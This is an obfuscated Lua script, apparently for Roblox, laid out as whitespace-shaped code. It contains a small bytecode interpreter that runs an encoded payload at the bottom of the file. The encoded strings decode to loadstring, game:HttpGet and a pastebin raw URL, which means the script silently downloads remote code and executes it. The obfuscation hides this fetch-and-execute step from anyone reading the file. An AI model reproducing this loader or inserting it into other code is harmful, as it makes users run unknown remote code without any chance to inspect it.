                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall; 
                                                          local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local       
                                                        function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local    
                                                      v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do   
                                                    if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if  
                                                  (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==(619 -(555 + 64)))   
                                                  then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=1 -0 ;end if (v31==(2 -1)) then return v32;end end   
                                                end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (933 -(857 + 74)) );v19=v19 + (570 -(367 + 201 
                                                )) ;return (v34 * (1183 -(214 + 713))) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=0 +  
                                              0 ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==(3 -2)) then v38=1 + 0  
                                              ;v39=(v21(v37,878 -(282 + 595) ,1657 -(1523 + (544 -(44 + 386))) ) * ((2 + 0)^(45 -13))) + v36 ;v35=1067 -(68 
                                             + 997) ;end if ((1270 -(226 + 1044))==v35) then v36=v24();v37=v24();v35=998 -(915 + (1568 -(998 + 488))) ;end if 
                                             (v35==(8 -6)) then v40=v21(v37,138 -(32 + 85) ,40 -9 );v41=((v21(v37,32 + 0 )==(1 + 0)) and  -(958 -(892 + 65)))   
                                          or (1 + 0) ;v35=4 -1 ;end if (v35==3) then if (v40==(0 -0)) then if (v39==(791 -(368 + 423))) then return v41 * (0 -0)  
                                          ;else v40=19 -(4 + 6 + 8) ;v38=(0 + 0) -0 ;end elseif (v40==(3757 -1710)) then return ((v39==(350 -(87 + 263))) and (v41  
                                          * ((3 -2)/(180 -((839 -(201 + 571)) + (1251 -(116 + 1022))))))) or (v41 * NaN) ;end return v8(v41,v40-(1809 -786) ) * (v38  
                                          + (v39/((2 + (0 -0))^(127 -75)))) ;end end end v26=nil;function v26(v42)local v43=0;local v44;local v45;while true do if (  
                                        v43==0) then v44=nil;if  not v42 then local v101=0 + (1423 -(630 + 793)) ;while true do if (v101==(0 -(0 -0))) then v42=v24();  
                                        if (v42==(0 -0)) then return "";end break;end end end v43=(4071 -3211 --[[==============================]]) -(814 + 45) ;end if ( 
                                        (2 -1)==v43) then v44=v3(v16,v19,(v19 + v42) -1 );v19=v19 + --[[============================================]] v42 ;v43=1 + 1 ;   
                                        end if (v43==(1 + 1)) then v45={};for v80=886 -(261 +   --[[======================================================]]624) , #v44 do  
                                      v45[v80]=v2(v1(v3(v44,v80,v80)));end v43=4 -1 ;end if --[[==========================================================]] (v43==(1083 -(   
                                      1020 + 60))) then return v6(v45);end end end v18=5; --[[==============================================================]]end if (v18==6) 
                                       then v29=nil;function v29()local v46=0 + 0 ;local  --[[================================================================]]v47;local v48;  
                                      local v49;local v50;local v51;local v52;local v53;  --[[==================================================================]]while true do 
                                       if (v46~=(1 + 2)) then else v53=nil;while true do  --[[==================================================================]]local v82=1171    
                                    -(418 + 753) ;local v83;local v84;while true do if (( --[[====================================================================]]1 + 0)==v82)  
                    then while true do if (v83==(0 + 0)) then v84=0;while true do if (v84 --[[====================================================================]]==0) then local 
               v129=0 + 0 ;while true do if (v129==(0 + 0)) then if (v47==0) then local   --[[======================================================================]]v165=0 -0 ;   
            local v166;while true do if (v165==(0 -0)) then v166=529 -(406 + 123) ;while  --[[======================================================================]]true do if (  
          v166==(1771 -(1749 + 20))) then v47=1 + 0 ;break;end if (0==v166) then local    --[[======================================================================]]v171=1322 -(  
        1249 + 73) ;while true do if (v171==(0 + 0)) then v48={};v49={};v171=1146 -(466 + --[[======================================================================]] 679) ;end if 
         (v171~=1) then else v166=1;break;end end end if (v166==(2 -1)) then local v172=  --[[======================================================================]]1018 -(697 +  
      321) ;local v173;while true do if (v172==(0 -0)) then v173=0 -0 ;while true do if ( --[[======================================================================]]v173==0) then 
       local v183=1900 -(106 + 1794) ;while true do if (v183==(1 + 0)) then v173=2 -1 ;     --[[==================================================================]]break;end if (( 
      0 + 0)~=v183) then else v50={};v51={v48,v49,nil,v50};v183=1428 -(41 + 1386) ;end end  --[[================================================================]]end if (v173==(   
    1190 -(449 + 740))) then v166=874 -(826 + 46) ;break;end end break;end end end end      --[[==============================================================]]break;end end end 
     if (v47==(105 -(17 + 86))) then local v167=0 + 0 ;local v168;while true do if (v167==(0  --[[==========================================================]]-0)) then v168=0 -0 
     ;while true do local v169=1898 -(260 + 1638) ;local v170;while true do if (v169==(440 -(   --[[====================================================]]382 + 58))) then v170=0 
    ;while true do if (v170~=0) then else if (v168~=0) then else for v184=167 -(122 + 44) ,v24()  --[[==============================================]]do local v185=0;local     
    v186;local v187;local v188;while true do if ((3 -2)==v185) then v188=nil;while true do if (v186== --[[====================================]](1 + 0)) then while true do   
    if (v187==(0 -0)) then v188=v22();if (v21(v188,3 -2 ,1 + 0 )~=0) then else local v199=0 + 0 ;local    --[[========================]]v200;local v201;local v202;local v203 
    ;while true do if ((1206 -(902 + 303))~=v199) then else local v204=0;while true do if (v204==(0 -0)) then v202=nil;v203=nil;v204=2 -1 ;end if (v204==(1 -0)) then v199= 
  67 -(30 + 35) ;break;end end end if (v199==(2 + 0)) then while true do if (v200==0) then local v206=683 -(483 + 200) ;while true do if (v206~=(1258 -(1043 + 214)))     
  then else v200=3 -2 ;break;end if (v206==(1212 -(323 + 889))) then v201=v21(v188,5 -3 ,3);v202=v21(v188,584 -(361 + 219) ,6);v206=1;end end end if ((766 -(468 + 297) 
  )~=v200) then else local v207=320 -(53 + 267) ;while true do if (v207==0) then v203={v23(),v23(),nil,nil};if (v201==(0 -0)) then local v212=0 + 0 ;while true do if (   
  v212~=(0 + 0)) then else v203[239 -(141 + 95) ]=v23();v203[3 + 1 ]=v23();break;end end elseif (v201==(851 -(20 + 830))) then v203[3 + 0 ]=v24();elseif (v201==(128 -(   
  116 + 10))) then v203[1 + 2 ]=v24() -((740 -(542 + 196))^(34 -18)) ;elseif (v201==(1 + 2)) then local v221=0 + 0 ;local v222;local v223;local v224;while true do if (   
  v221==(1 + 0)) then v224=nil;while true do if (v222==(2 -1)) then while true do if (v223~=(0 -0)) then else v224=1551 -(1126 + 425) ;while true do if (v224==0) then    
  v203[408 -(118 + 287) ]=v24() -(2^16) ;v203[4]=v23();break;end end break;end end break;end if ((0 -0)==v222) then local v225=1121 -(118 + 1003) ;while true do if (v225 
  ==(2 -1)) then v222=378 -(142 + 235) ;break;end if (v225==(0 -0)) then v223=0 + 0 ;v224=nil;v225=978 -(553 + 424) ;end end end end break;end if (v221==(0 -0)) then     
  v222=0 + 0 ;v223=nil;v221=1;end end end v207=1 + 0 ;end if (v207==(1 + 0)) then v200=2 + 0 ;break;end end end if (v200==(852 -(254 + 595))) then if (v21(v202,3,3)==(1  
  + 0)) then v203[3 + 1 ]=v53[v203[1794 -(573 + 1217) ]];end v48[v184]=v203;break;end if (v200==2) then local v209=0 -0 ;while true do if (0~=v209) then else if (v21(    
  v202,1 + 0 ,1)~=1) then else v203[2 -0 ]=v53[v203[5 -3 ]];end if (v21(v202,941 -(714 + 225) ,5 -3 )==(1 -0)) then v203[6 -3 ]=v53[v203[3]];end v209=1 + 0 ;end if (v209 
  ~=(1 + 0)) then else v200=809 -(118 + 688) ;break;end end end end break;end if (v199==(0 -0)) then local v205=0;while true do if (v205~=(754 -(239 + 514))) then else     
  v199=1;break;end if (v205~=(0 + 0)) then else v200=1886 -(927 + 959) ;v201=nil;v205=1;end end end end end break;end end break;end if (v186~=(0 -0)) then else local v196= 
  732 -(16 + 716) ;while true do if (v196~=1) then else v186=1;break;end if (v196~=0) then else v187=0 -0 ;v188=nil;v196=98 -(11 + 86) ;end end end end break;end if (v185  
  ==(0 -0)) then v186=0 + 0 ;v187=nil;v185=1;end end end for v189=286 -(175 + 110) ,v24() do v49[v189-(1330 -(797 + 532)) ]=v29();end v168=2 -1 ;end if (1~=v168) then else 
   return v51;end break;end end break;end end end break;end end end v129=1 + 0 ;end if (v129==(1 + 0)) then v84=2 -1 ;break;end end end if (v84==(2 -1)) then if ((1 + 0)== 
  v47) then local v156=1202 -(373 + 829) ;local v157;local v158;while true do if (v156==(1 + 0)) then while true do if (v157==(731 -(476 + 255))) then v158=1130 -(369 +    
  761) ;while true do if (v158==(1 + 0)) then local v174=533 -(43 + 490) ;while true do if (v174==(734 -(711 + 22))) then v158=2 -0 ;break;end if (v174~=(0 -0)) then else  
  for v178=1,v52 do local v179=0;local v180;local v181;local v182;while true do if (v179==0) then local v191=0;local v192;while true do if (v191~=(238 -(64 + 174))) then   
  else v192=0 + 0 ;while true do if (v192==1) then v179=860 -(240 + 619) ;break;end if (v192~=(0 -0)) then else local v197=0;while true do if (v197==(337 -(144 + 192)))    
  then v192=217 -(42 + 174) ;break;end if (v197~=(0 -0)) then else v180=0 + 0 ;v181=nil;v197=1;end end end end break;end end end if (v179==(1745 -(1344 + 400))) then v182= 
  nil;while true do if (v180~=(0 + 0)) then else local v193=405 -(255 + 150) ;local v194;while true do if ((0 + 0)==v193) then v194=0 + 0 ;while true do if (v194~=(1505 -( 
  363 + 1141))) then else v180=1581 -(1183 + 397) ;break;end if (v194==(0 + 0)) then local v198=0 -0 ;while true do if (v198==1) then v194=1 + 0 ;break;end if (v198==0)    
  then v181=v22();v182=nil;v198=3 -2 ;end end end end break;end end end if (v180==(1 + 0)) then if (v181==(1976 -(1913 + 62))) then v182=v22()~=(0 + 0) ;elseif (v181==2)   
  then v182=v25();elseif (v181~=(409 -(183 + 223))) then else v182=v26();end v53[v178]=v182;break;end end break;end end end v51[3]=v22();v174=2 -1 ;end end end if (v158  
  ==(1935 -(565 + 1368))) then v47=2 -0 ;break;end if (v158==(0 + 0)) then local v175=0 -0 ;while true do if (v175==(1662 -(1477 + 184))) then v158=338 -(10 + 327) ;     
  break;end if (v175~=(0 + 0)) then else local v177=338 -(118 + 220) ;while true do if ((1 + 0)==v177) then v175=450 -(108 + 341) ;break;end if (v177~=(0 -0)) then else  
    v52=v24();v53={};v177=1 + 0 ;end end end end end end break;end end break;end if (v156~=0) then else v157=1493 -(711 + 782) ;v158=nil;v156=1 -0 ;end end end break;end 
     end break;end end break;end if (v82~=(856 -(564 + 292))) then else v83=0;v84=nil;v82=470 -(270 + 199) ;end end end break;end if (v46~=1) then else local v74=0 -0 ;  
    while true do if (v74~=(2 -1)) then else v46=306 -(244 + 60) ;break;end if (v74==0) then v49=nil;v50=nil;v74=2 -1 ;end end end if ((2 + 0)==v46) then local v75=0 + 0 
     ;while true do if (0==v75) then v51=nil;v52=nil;v75=1;end if (v75==1) then v46=1 + 2 ;break;end end end if ((476 -(41 + 435))==v46) then local v76=0 -0 ;while true  
      do if (v76==0) then v47=0 + 0 ;v48=nil;v76=1002 -(938 + 63) ;end if ((1 + 0)==v76) then v46=1126 -(936 + 189) ;break;end end end end end v30=nil;v18=7;end if (   
      v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v69=v2(v0(v54,16));if v20 then     
      local v85=0;local v86;while true do if (v85==1) then return v86;end if (v85==0) then v86=v5(v69,v20);v20=nil;v85=1;end end else return v69;end end end);v18=1;end 
         if (v18==3) then v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + (14 -11) );v19=v19 + (11 -7) ;return (v58 * (16779052 -(1045 + (1296 -(351 + 154 
        ))))) + (v57 * (165890 -100354)) + (v56 * ((1964 -(1281 + 293)) -134)) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=0;local 
         v63;local v64;local v65;while true do if (v62==1) then v65=v59[3];return function(...)local v87=v63;local v88=v64;local v89=v65;local v90=v28;local v91=1;     
          local v92= -1;local v93={};local v94={...};local v95=v12("#",...) -1 ;local v96={};local v97={};for v102=0,v95 do if (v102>=v89) then v93[v102-v89 ]=v94[   
            v102 + 1 ];else v97[v102]=v94[v102 + 1 ];end end local v98=(v95-v89) + 1 ;local v99;local v100;while true do v99=v87[v91];v100=v99[1];if (v100<=3) then   
              if (v100<=1) then if (v100>0) then v97[v99[2]]=v99[3];else local v111=0;local v112;local v113;local v114;local v115;while true do if (v111==2) then for 
                 v159=v112,v92 do v115=v115 + 1 ;v97[v159]=v113[v115];end break;end if (v111==1) then v92=(v114 + v112) -1 ;v115=0;v111=2;end if (v111==0) then v112= 
                  v99[2];v113,v114=v90(v97[v112](v13(v97,v112 + 1 ,v99[3])));v111=1;end end end elseif (v100>2) then v97[v99[2]]();else local v116=0;local v117;    
                      local v118;while true do if (v116==0) then v117=v99[2];v118=v97[v99[3]];v116=1;end if (1==v116) then v97[v117 + 1 ]=v118;v97[v117]=v118[v99[4 
                                  ]];break;end end end elseif (v100<=5) then if (v100>4) then v97[v99[2]]=v61[v99[3]];else local v121=0;local v122;while true do if 
                                       (v121==0) then v122=v99[2];v97[v122]=v97[v122](v13(v97,v122 + 1 ,v92));break;end end end elseif (v100>6) then do return;end  
                                      else local v123=0;local v124;local v125;local v126;local v127         ;local v128;while true do if (v123==5) then v99=v87[v91 
                                      ];v128=v99[2];v97[v128]=v97[v128](v13(v97,v128 + 1 ,v92));v91         =v91 + 1 ;v99=v87[v91];v123=6;end if (v123==6) then   
                                      v97[v99[2]]();v91=v91 + 1 ;v99=v87[v91];do return;end break;          end if (v123==3) then v99=v87[v91];v97[v99[2]]=v99[3] 
                                      ;v91=v91 + 1 ;v99=v87[v91];v128=v99[2];v123=4;end if (v123==0         ) then v124=nil;v125,v126=nil;v127=nil;v128=nil;v97[  
                                      v99[2]]=v61[v99[3]];v123=1;end if (v123==1) then v91=v91 + 1            ;v99=v87[v91];v97[v99[2]]=v61[v99[3]];v91=v91 + 1 ; 
                                      v99=v87[v91];v123=2;end if (v123==4) then v125,v126=v90(v97[            v128](v13(v97,v128 + 1 ,v99[3])));v92=(v126 + v128) 
                                       -1 ;v124=0;for v162=v128,v92 do v124=v124 + 1 ;v97[v162]=              v125[v124];end v91=v91 + 1 ;v123=5;end if (v123== 
                                        2) then v128=v99[2];v127=v97[v99[3]];v97[v128 + 1 ]=v127;             v97[v128]=v127[v99[4]];v91=v91 + 1 ;v123=3;end    
                                        end end v91=v91 + 1 ;end end;end if (v62==0) then v63=v59[1             ];v64=v59[2];v62=1;end end end return v30(v29() 
                                        ,{},v17)(...);end if (v18==1) then v21=nil;function v21(v66             ,v67,v68)if v68 then local v70=266 -((1812 -( 
                                        214 + 1570)) + (1693 -(990 + 465))) ;local v71;while true                do if (v70==(0 -0)) then v71=(v66/((1561 -(  
                                        1381 + 178))^(v67-(1 + 0))))%((2 + 0)^(((v68-(1 + 0)) -(                  v67-(3 -(1 + 1)))) + 1 + (0 -0))) ;return 
                                         v71-(v71%1) ;end end else local v72=470 -(381 + 89) ;                    local v73;while true do if (0==v72) then  
                                          v73=(2 + 0)^(v67-(1 + 0)) ;return (((v66%(v73 + v73))>=                   v73) and (1 -0)) or (1156 -(1074 + 82 
                                          )) ;end end end end v22=nil;v18=2;end end end v15(                                                          
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


--------------------------------------------------------------------------------
"LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F3637796833514C3600083O0012063O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
